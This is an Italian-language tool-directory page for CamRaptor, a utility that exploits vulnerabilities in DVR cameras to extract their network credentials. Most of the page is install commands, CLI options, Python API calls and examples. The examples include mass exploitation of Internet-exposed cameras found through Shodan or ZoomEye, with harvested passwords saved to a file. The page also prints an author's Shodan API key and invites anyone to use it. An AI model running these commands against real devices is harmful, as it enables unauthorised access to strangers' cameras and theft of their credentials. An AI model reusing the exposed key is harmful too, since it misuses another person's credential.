Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CamRaptor — CamRaptor è uno strumento che sfrutta diverse vulnerabilità in telecamere DVR popolari per ottenere le credenziali di rete delle telecamere. | Kitploit
Strumenti/GitHubGitHub/entysec/camraptor
Sicurezza IoTAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza Hardware e IoT
GitHubentysec/camraptor

CamRaptor

CamRaptor è uno strumento che sfrutta diverse vulnerabilità in telecamere DVR popolari per ottenere le credenziali di rete delle telecamere.

Vedi Repository
247392 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CamRaptor

Developer Language Forks Stars CodeFactor

CamRaptor è uno strumento che sfrutta diverse vulnerabilità in telecamere DVR popolari per ottenere le credenziali di rete delle telecamere.

Caratteristiche

  • Sfrutta vulnerabilità nei modelli di telecamera più popolari come Novo, CeNova e QSee.
  • Ottimizzato per sfruttare più telecamere contemporaneamente da un elenco con threading abilitato.
  • Utilizzo semplice tramite CLI e API.

Installazione

root@kitploit:~
pip3 install git+https://github.com/EntySec/CamRaptor

Utilizzo base

Per usare CamRaptor basta digitare camraptor nel terminale.

root@kitploit:~
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
                 [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain network camera credentials.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.

Esempi

Sfruttare una singola telecamera

Hackiamo la mia telecamera solo per divertimento.

root@kitploit:~
camraptor -a 192.168.99.100

Sfruttare telecamere da Internet

Proviamo a usare il motore di ricerca Shodan per sfruttare telecamere su Internet, lo useremo con -t per uno sfruttamento rapido.

root@kitploit:~
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTA: La chiave API Shodan fornita (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) è la mia chiave PRO, puoi usare questa chiave o la tua, sentiti libero di usare tutte le nostre risorse gratuitamente :)

Sfruttare telecamere da file di input

Proviamo a usare un database aperto di telecamere con -t per uno sfruttamento rapido.

root@kitploit:~
camraptor -t -i cameras.txt -o passwords.txt

NOTA: Sfrutterà tutte le telecamere nell'elenco cameras.txt tramite i loro indirizzi e salverà tutte le password ottenute in passwords.txt.

Utilizzo API

CamRaptor ha anche una propria API Python che può essere richiamata importando CamRaptor nel tuo codice.

root@kitploit:~
from camraptor import CamRaptor

Funzioni base

Queste sono tutte le funzioni base di CamRaptor che possono essere usate per sfruttare una telecamera specificata.

  • exploit(address) - Sfrutta una singola telecamera dato un indirizzo.

Esempi

Sfruttare una singola telecamera

root@kitploit:~
from camraptor import CamRaptor

camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')

print(creds)
Scarica lo strumento